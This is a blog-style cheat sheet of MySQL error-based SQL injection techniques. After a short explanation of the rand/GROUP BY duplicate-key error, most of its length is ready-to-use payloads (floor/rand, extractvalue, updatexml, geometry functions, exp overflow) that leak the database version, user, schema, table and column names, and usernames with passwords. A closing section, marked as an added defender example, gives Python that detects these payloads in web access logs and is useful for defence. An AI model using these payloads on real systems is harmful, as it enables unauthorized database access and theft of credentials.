SQL Injection: Error-Based Injection

2021-08-03 05:59:18 · 3594 characters · 2081 views

Fixed statement template

union select 1 from (select+count(*),concat(floor(rand(0)*2),(注入爆資料語句))a from information_schema.tables group by a)b

If the id parameter is injectable, the following statement can be used to trigger the error. The duplicate-entry error arises because rand(0) is evaluated both when the GROUP BY key is looked up and again when it is inserted into the grouping temporary table, so the same key is inserted twice and MySQL reports it, together with the concatenated subquery result, in the error message.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

error 1062 (23000): duplicate entry '5.1.33-community-log1' for key 1

As you can see, the MySQL version was successfully leaked through the error message.

union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(0x3a,database(),0x3a,user(),0x3a,version(),0x3a,@@datadir)))a+from+information_schema.tables+group+by+a)b

union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select distinct concat(0x7e,0x27,schema_name,0x27,0x7e)+from+information_schema.schemata+limit+0,1))a+from information_schema.tables+group+by+a)b

union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1))a+from+information_schema.tables+group+by+a)b

union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+column_name+from+information_schema.columns+where+table_name=表名+limit+0,1))a+from+information_schema.tables+group+by+a)b

union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(0x3a,欄位1,0x3a,欄位2)+from+表名+limit+0,1))a+from+information_schema.tables+group+by+a)b

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

and extractvalue(1, concat(0x7e, (select @@version),0x7e))

and extractvalue(1, concat(0x7e, (select user()),0x7e))

and extractvalue(1, concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e))

and extractvalue(1, concat(0x7e, (select column_name from information_schema.columns where table_name=0x666c6167 limit 1,1),0x7e))

and extractvalue(1, concat(0x7e,(select distinct concat(0x23,id,0x3a,flag,0x23) from flag limit 0,1)))

and updatexml(1,concat(0x7e,version(),user(),0x7e),1)

and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e),1)

and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),0x7e),1)

and updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e,(select password from users limit 1,1),0x7e),1)

and geometrycollection((select * from(select * from(select user())a)b));

and multipoint((select * from(select * from(select user())a)b));

and polygon((select * from(select * from(select user())a)b));

and multipolygon((select * from(select * from(select user())a)b));

and linestring((select * from(select * from(select user())a)b));

and multilinestring((select * from(select * from(select user())a)b));

and exp(~(select * from(select user())a));
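As an added, defender-side example that is not part of the original post, the following Python scans web access-log lines for the payload families listed above: the count(*)/floor(rand(0)*2)/group by trick, extractvalue, updatexml, the geometry constructors fed a subquery, and exp(~...). The combined log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the MySQL error-based payload families on this page, matched
# against the decoded, lower-cased, whitespace-collapsed query string.
SIGNATURES = {
    "floor_rand_groupby": re.compile(r"count\(\*\).*floor\(rand\(\d*\)\*2\).*group by", re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
    # geometry constructors wrapping a SELECT
    "geometry": re.compile(
        r"\b(?:geometrycollection|multipoint|polygon|multipolygon|linestring|multilinestring)"
        r"\s*\(\s*\(?\s*select\b"),
    "exp_overflow": re.compile(r"\bexp\s*\(\s*~\s*\("),
}

# Apache/nginx combined log format (assumed); only the fields we need are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def normalize(query):
    """Decode %xx and '+' escapes, fold case, collapse whitespace so spacing tricks still match."""
    return re.sub(r"\s+", " ", unquote_plus(query)).lower()

def classify(path):
    """Return the names of the payload families present in a request path's query string."""
    if "?" not in path:
        return []
    q = normalize(path.split("?", 1)[1])
    return [name for name, pat in SIGNATURES.items() if pat.search(q)]

def scan_log(lines):
    """Return (ip, status, path, families) for every log line carrying a matching payload."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        families = classify(m.group("path"))
        if families:
            hits.append((m.group("ip"), m.group("status"), m.group("path"), families))
    return hits

# Constructed sample access-log lines (not from any real server).
SAMPLE_LOG = [
    '203.0.113.10 - - [03/Aug/2021:05:59:18 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.10 - - [03/Aug/2021:05:59:20 +0000] "GET /article.php?id=1+and+updatexml(1,concat(0x7e,version(),user(),0x7e),1) HTTP/1.1" 500 211',
    '203.0.113.10 - - [03/Aug/2021:05:59:22 +0000] "GET /article.php?id=1%20and%20extractvalue(1,%20concat(0x7e,%20(select%20@@version),0x7e)) HTTP/1.1" 500 198',
    '203.0.113.10 - - [03/Aug/2021:05:59:25 +0000] "GET /article.php?id=1+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+database()))a+from+information_schema.tables+group+by+a)b HTTP/1.1" 500 240',
    '203.0.113.10 - - [03/Aug/2021:05:59:27 +0000] "GET /article.php?id=1+and+exp(~(select+*+from(select+user())a)) HTTP/1.1" 500 187',
]
```

Pairing a matched family with a 500 response on the same request is the useful alert condition: it means the database error actually reached the client.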
